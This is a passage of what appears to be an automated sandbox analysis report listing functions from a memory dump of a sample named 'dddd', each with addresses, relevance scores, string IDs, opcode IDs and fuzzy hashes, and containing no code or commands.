                                                                                                                                                                                                      • Instruction ID: 62e711188a0e87065bb7a99c6c95179511e6ce6cebc836cd0fbc4c5ebe697ea8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2b253cbf950be01e9e4c895a92ce0c0e8cfc5795f4754d1267019653fb7f30c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A43145A2A1D6560FD316BF7CE8965E93F90DF42264B0841FAE498CB5D3D808984683D5
                                                                                                                                                                                                      Function 00007FFB498C7404 Relevance: 1.8, Strings: 1, Instructions: 582COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: HA{I
                                                                                                                                                                                                      • API String ID: 0-3447132464
                                                                                                                                                                                                      • Opcode ID: f60c848b2d9b5b61942915d2ab13f55a73cdb62a8e3e466254591f28e7c56acd
                                                                                                                                                                                                      • Instruction ID: 22a39c9e3f9f643e230aba254a61150e358e897f2a4f8a32640f14649aaac8fd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f60c848b2d9b5b61942915d2ab13f55a73cdb62a8e3e466254591f28e7c56acd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D602C470A0CA4A4FD799EF2CC4956B97BE1FF95300F14427ED49AC7296CE24E846C781
                                                                                                                                                                                                      Function 00007FFB498CC0E0 Relevance: 1.7, Strings: 1, Instructions: 427COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: HA{I
                                                                                                                                                                                                      • API String ID: 0-3447132464
                                                                                                                                                                                                      • Opcode ID: 1f172e69255593ea3b0796a69ddeccefce1b5d2a99a32f732637b07c88df74b6
                                                                                                                                                                                                      • Instruction ID: f9a39c048a8d622a0100469e78b449919c6ad4221bb1c4bceaf7d01ca2e8cbfd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f172e69255593ea3b0796a69ddeccefce1b5d2a99a32f732637b07c88df74b6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BB134A3B1DD1B0FF7E9AE7DA45927427C1EBB82A1B2404BBD49DC32D1DD189C064381
                                                                                                                                                                                                      Function 00007FFB498C09FF Relevance: 1.7, Strings: 1, Instructions: 419COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: #CM_^
                                                                                                                                                                                                      • API String ID: 0-2311673530
                                                                                                                                                                                                      • Opcode ID: e9d0c365599aa1c448d953d4c792232e05ed6bf02a6c957e0f8b0c7d0b7753ea
                                                                                                                                                                                                      • Instruction ID: 01a8895ac35405036c2d4cbff04e1203db7b92c21867fd0bc95e34c7d05a6d04
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e9d0c365599aa1c448d953d4c792232e05ed6bf02a6c957e0f8b0c7d0b7753ea
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3E17E70A0D64A8FEB59EF7CD191BA877A1EF45384F5441BDD419DB2D2CE38A880CB50
                                                                                                                                                                                                      Function 00007FFB498C93B0 Relevance: 1.6, Strings: 1, Instructions: 390COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                      • API String ID: 0-2564639436
                                                                                                                                                                                                      • Opcode ID: 7b11f3df4fd4625c408a91112df1b8ff0db0a3d0802f9c62d7fad247bbec966b
                                                                                                                                                                                                      • Instruction ID: 8b89fb3542a163efafc210bad6d3a36ce89a2e28a88fcc1c43ce060f04e6599b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b11f3df4fd4625c408a91112df1b8ff0db0a3d0802f9c62d7fad247bbec966b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71C1DDB0A1CF468FD769EE2CD481636B3E1FF94340B10457ED49A83696DA35F842CB81
                                                                                                                                                                                                      Function 00007FFB498CD173 Relevance: 1.5, Strings: 1, Instructions: 211COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: rL_^
                                                                                                                                                                                                      • API String ID: 0-671284935
                                                                                                                                                                                                      • Opcode ID: f0db6b13329f081881f7de8d135fe81de597bafc94354efd981633781ea42660
                                                                                                                                                                                                      • Instruction ID: fe13aaa92dce0fb996ac15fd25e95e6348717a6ed44d550196c1d79f502ebba0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0db6b13329f081881f7de8d135fe81de597bafc94354efd981633781ea42660
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2851E742B0D1A61AE742BF7CF5A51ED3F91EF4222A70841BBD5DC8E593DC08A44E83D9
                                                                                                                                                                                                      Function 00007FFB498DD668 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: HA{I
                                                                                                                                                                                                      • API String ID: 0-3447132464
                                                                                                                                                                                                      • Opcode ID: f948d9a82dbaa39d176d29d5f46c8e5b7befb7c0e78e9132bec7369c97fa4864
                                                                                                                                                                                                      • Instruction ID: 9bc314f5a170a54eff50ca2f9396b12cb48f013fbe7e28123049f9012c159e75
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f948d9a82dbaa39d176d29d5f46c8e5b7befb7c0e78e9132bec7369c97fa4864
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA4144A260DA8E0FE799EE7CD8591B53BD0EBA96A070403FBD04DC7593DD289C0683D1
                                                                                                                                                                                                      Function 00007FFB498C109D Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                                                                                      • Opcode ID: 6f955277ad38ca42407d7ca88d9feb14ec47327d7dace973a59e6ed384c26952
                                                                                                                                                                                                      • Instruction ID: d5afb1f3791bebc5746b78b775539fb495dc3b721f5d67db57e5c1a3d6ce75ed
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f955277ad38ca42407d7ca88d9feb14ec47327d7dace973a59e6ed384c26952
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC51BE6044E3C25FD7439B78C860A523FF5AF47264B0A41EFD5D9CE0A3CA2D984AC722
                                                                                                                                                                                                      Function 00007FFB498C39FA Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: M_^
                                                                                                                                                                                                      • API String ID: 0-2269846659
                                                                                                                                                                                                      • Opcode ID: 43886635db0541a13a7c9fb06d194a65a79eb74f626fdfc9dcf008af2a2c893f
                                                                                                                                                                                                      • Instruction ID: 5f0d5334a9d664d100ccecccda281a3cdb14ac0dad5e63cc7f4e254bae432478
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43886635db0541a13a7c9fb06d194a65a79eb74f626fdfc9dcf008af2a2c893f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9512562B0E65A0AE702BFBCF9554FDBF90EF46366B0802BBD598C64C3CD14544983E4
                                                                                                                                                                                                      Function 00007FFB498C5A71 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: HA{I
                                                                                                                                                                                                      • API String ID: 0-3447132464
                                                                                                                                                                                                      • Opcode ID: 98060b6a2441ab6c113cb52269c0ad19be9a4de7ddffd68e6859319fc5170fc5
                                                                                                                                                                                                      • Instruction ID: 8bccc50e9be47f5eeab42e6bcabcf41728662e789c61ea124341fd1e51196475
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98060b6a2441ab6c113cb52269c0ad19be9a4de7ddffd68e6859319fc5170fc5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E41D3A2B1DA4B0FEB98EE7CD45567937D1FFA8290B44017AD49DC36C6DD18D8428381
                                                                                                                                                                                                      Function 00007FFB498C8478 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: HA{I
                                                                                                                                                                                                      • API String ID: 0-3447132464
                                                                                                                                                                                                      • Opcode ID: 84c00dab8be6ce61a8b8ee828f8c68bc601f3187f23cd34d071df6d0a67dd13d
                                                                                                                                                                                                      • Instruction ID: 043ded27e483cbb3ba5bc6be3abeec525b564122ad80d06dbdbc38e3fedb58e3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84c00dab8be6ce61a8b8ee828f8c68bc601f3187f23cd34d071df6d0a67dd13d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 083126A2B2CD1B0BE794AE3CD8092B937C0EBA5390F05097BE45DC32E1DE18CD464385
                                                                                                                                                                                                      Function 00007FFB498C2C98 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: HA{I
                                                                                                                                                                                                      • API String ID: 0-3447132464
                                                                                                                                                                                                      • Opcode ID: d309afca9dd518b9832f0f0b0520a158d9793a23768de45d658cec9ccf1e29c4
                                                                                                                                                                                                      • Instruction ID: 0331849ac6c7e0318463ac3d8db28866f42561f1ff9d396749c1e412be401d7f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d309afca9dd518b9832f0f0b0520a158d9793a23768de45d658cec9ccf1e29c4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C31B0B1B1891A4FEB98EE6CD489BF973D1FB98351F040176E40ED3295DE249C418380
                                                                                                                                                                                                      Function 00007FFB498C595D Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: @W{I
                                                                                                                                                                                                      • API String ID: 0-275310109
                                                                                                                                                                                                      • Opcode ID: ce4f3988543151e17bb5520c0b28a3b0c5abfde2cf300bd3c12f9c544255d638
                                                                                                                                                                                                      • Instruction ID: cec32169965fac58e9262785ae1c67f9b5a7d018b5b2207efdb03736bd9bdc8d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce4f3988543151e17bb5520c0b28a3b0c5abfde2cf300bd3c12f9c544255d638
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F021D67291CB8A8FE744FE2CC84566AB7E1FBE8350F04057AD44AD3591DE34E945C782
                                                                                                                                                                                                      Function 00007FFB498DF0E0 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: #CM_^
                                                                                                                                                                                                      • API String ID: 0-2311673530
                                                                                                                                                                                                      • Opcode ID: 71dd7cd36e10f38158aa7f05aeb52b8b9c2fba5be7fa2abb8cf07c219eca7ee0
                                                                                                                                                                                                      • Instruction ID: c35e67de48a00d0bdf76b9de8cbc32a5c286ce9216ea9d606efe949512855449
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71dd7cd36e10f38158aa7f05aeb52b8b9c2fba5be7fa2abb8cf07c219eca7ee0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0211906170D94B5FDB8AEF3CC0517686791EF4B38475801F9C449CB6D6CD38A8458761
                                                                                                                                                                                                      Function 00007FFB498DF1E0 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: #CM_^
                                                                                                                                                                                                      • API String ID: 0-2311673530
                                                                                                                                                                                                      • Opcode ID: 05f297505d4fb0cc9cb396ebdd9fddade48cd54866cb97186b44824c1201554f
                                                                                                                                                                                                      • Instruction ID: 8e061fd0b63002e2e7b8c7f4918346b817d4e482c03d5b098922564a819eacc0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05f297505d4fb0cc9cb396ebdd9fddade48cd54866cb97186b44824c1201554f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52113A6091D6874FE64AEF3CD1917643791AF4B3C8B8401F9C419DB5E3CD297898C721
                                                                                                                                                                                                      Function 00007FFB498CC419 Relevance: .4, Instructions: 398COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 525890ad9e2de1eefb0a0b05179a7ecd070902b394e34dfb97f760080ac2d467
                                                                                                                                                                                                      • Instruction ID: 9d5f5d30352a9a78733151190fff739bc20349e574531362c26770b0daa9c19d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 525890ad9e2de1eefb0a0b05179a7ecd070902b394e34dfb97f760080ac2d467
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71C11393B0D5930AE3027E7CFA550FC7B91EFA127AB0841BBD59C8B8C3DD18A44A42D5
                                                                                                                                                                                                      Function 00007FFB498C6DB8 Relevance: .4, Instructions: 356COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: b6e0af0b22fe54e478e0e656108aff6c0cb45971958e69092573c3df097b4313
                                                                                                                                                                                                      • Instruction ID: 7ffafeb9c7bd696d04990a67d473420a662a4c84224fec199fec8f87862c668a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6e0af0b22fe54e478e0e656108aff6c0cb45971958e69092573c3df097b4313
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7A15AA2A0EA820FE75AAF7CDC551647F91EFD5A6471803FBD088C71D7EC14A80683D1
                                                                                                                                                                                                      Function 00007FFB498DBAC5 Relevance: .3, Instructions: 286COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 90a9a7840eb21044ed59249bf19d075d5f0c4d79d621a46781a72b55fdc113b1
                                                                                                                                                                                                      • Instruction ID: 5bffc6bd11ffcae354cef1913f3c58ad72acb672e993b4279f53b107b8076e9b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90a9a7840eb21044ed59249bf19d075d5f0c4d79d621a46781a72b55fdc113b1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7381387160DA464FE399AF3CD88567077E0FF96360B1802BED489C71A7DA29F842C751
                                                                                                                                                                                                      Function 00007FFB498C1289 Relevance: .3, Instructions: 284COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 912f3d1296fe2b92b2f818caa0366e4bb7fff4c7290cb3e167487f77f1ecdc2b
                                                                                                                                                                                                      • Instruction ID: b6b4a7f7cd6fb16af9e215d1f63a02646667b77ffbf9f59b540f17db5550135b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 912f3d1296fe2b92b2f818caa0366e4bb7fff4c7290cb3e167487f77f1ecdc2b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C081E26260DA8A4FD396EF3CC9949647FE1EF9734030941FAD498CB1E3D928EC458391
                                                                                                                                                                                                      Function 00007FFB498DB28C Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 37b4ccc89f09d7b0e7d86882747e4fb6c35eb8feff97b7f588cfea3e0f577ab2
                                                                                                                                                                                                      • Instruction ID: 48f4c367ee4b90cc8473e20403559fb6ac5924d6f539744ec975d0427ee2b79e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37b4ccc89f09d7b0e7d86882747e4fb6c35eb8feff97b7f588cfea3e0f577ab2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F7101B1A0DA8A4FE799EF3CC8557697BE1EF95740F0402BED44DC7292CD28AC018761
                                                                                                                                                                                                      Function 00007FFB498C9440 Relevance: .2, Instructions: 215COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 5d3db30ad267b8d34cfbcb35dd65d15cc6cbd1b79f02aaf239441067e74e3380
                                                                                                                                                                                                      • Instruction ID: 6a357f90636a4665d2b59a86af9a457a97454e01ca3c1caf2b648d2022fdc98a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d3db30ad267b8d34cfbcb35dd65d15cc6cbd1b79f02aaf239441067e74e3380
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F51F17161DE0B4FE758AE6CD884A7173E0EFA9350B140679D49EC3292DA29F887C781
                                                                                                                                                                                                      Function 00007FFB498D28E8 Relevance: .2, Instructions: 203COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 468d26402a4650843270a3515f831305fdaeb7118a165f441e1480c1075ecd86
                                                                                                                                                                                                      • Instruction ID: 397581b59f015afed7964c7140629d0f119390b174c382a8319e1c65c8c9a758
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 468d26402a4650843270a3515f831305fdaeb7118a165f441e1480c1075ecd86
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A251CA61B1C95A4FEB99EE2DD4559B937D1EF58750F0402AAF44EC3297CD28E84183C1
                                                                                                                                                                                                      Function 00007FFB498C90CA Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 0d70c3abfb915a5799f933c5dd417a13e2acf1bb62a8e7ee4544ff6d3226a77e
                                                                                                                                                                                                      • Instruction ID: a0d08961e024d601cf77ea9fb316630a8c178a936be435c29d1c66b6f7486730
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d70c3abfb915a5799f933c5dd417a13e2acf1bb62a8e7ee4544ff6d3226a77e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48415D6170C80E4FEBA4EE5CE588B6473D1EB993A1B1405FBE05DC72A6C925DC468780
                                                                                                                                                                                                      Function 00007FFB498CDC60 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 6c814065556cf97a806c49d810c20dbada1d13f8e9f7e25e2bf0e6af65ed45bc
                                                                                                                                                                                                      • Instruction ID: 56c3f169605028d5c2894cc2afbafdf6584742c7893ead4e959ffd9fb6e19649
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c814065556cf97a806c49d810c20dbada1d13f8e9f7e25e2bf0e6af65ed45bc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE41AF7061CA4A8FDB99EF3CC090E6277E1EF99340B1445A9D09AC76E6CE25F845C740
                                                                                                                                                                                                      Function 00007FFB498D5B40 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
